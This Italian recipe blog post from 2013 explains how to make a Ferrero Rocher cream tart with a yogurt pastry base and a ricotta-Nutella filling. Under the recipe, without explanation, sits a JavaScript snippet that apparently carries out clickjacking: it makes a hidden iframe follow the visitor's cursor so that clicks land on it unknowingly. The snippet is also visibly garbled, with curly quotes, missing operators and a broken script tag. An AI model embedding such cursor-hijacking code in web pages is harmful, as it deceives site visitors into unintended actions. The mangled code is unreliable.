lunedì 14 ottobre 2013

CROSTATA ALLA CREMA FERRERO ROCHER

Ingredienti Per la frolla: 500 gr di farina "00" per dolci 2 uova 70 gr di nocciole tritate 125 gr di yogurt bianco 80 gr di burro fuso e freddo 1 pizzico di sale 130 gr di zucchero a velo 3 cucchiaini di lievito 1 cucchiaino di essenza di vaniglia Per la farcitura 400 gr di ricotta 5 cucchiai colmi di Nutella morbida 30 gr di zucchero a velo 80 gr di wafer al cacao sbriciolati 50 gr di granella di nocciole Per decorare: 40 gr di wafer al cacao sbriciolati 30 gr di granella di nocciole Preparazione: Per la frolla: impastate con la planetaria burro, zucchero e sale, unite le uova, lo yogurt, l'essenza di vaniglia, infine le farine setacciate con il lievito. Foderate uno stampo da 28 cm. di diametro spennellandolo tutto con burro e fate aderire la carta forno. Prelevate parte dell'impasto e foderate il fondo e i bordi. Coprite l'impasto con altra carta forno, versate i fagioli secchi ed infornate a 170°C per circa 30 minuti. Togliete la carta con i fagioli e rimettete la base in forno per altri 15 minuti. Per la farcia: mescolate la ricotta con lo zucchero, unite la Nutella, i wafer sbriciolati, la granella ed amalgamate bene. Se il composto vi sembra troppo solido unite qualche cucchiaio di panna fresca (a me non è servita). Versate la crema sulla base fredda e ricopritela con le briciole di wafer e la granella di nocciole. La crostata va conservata in frigorifero.
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>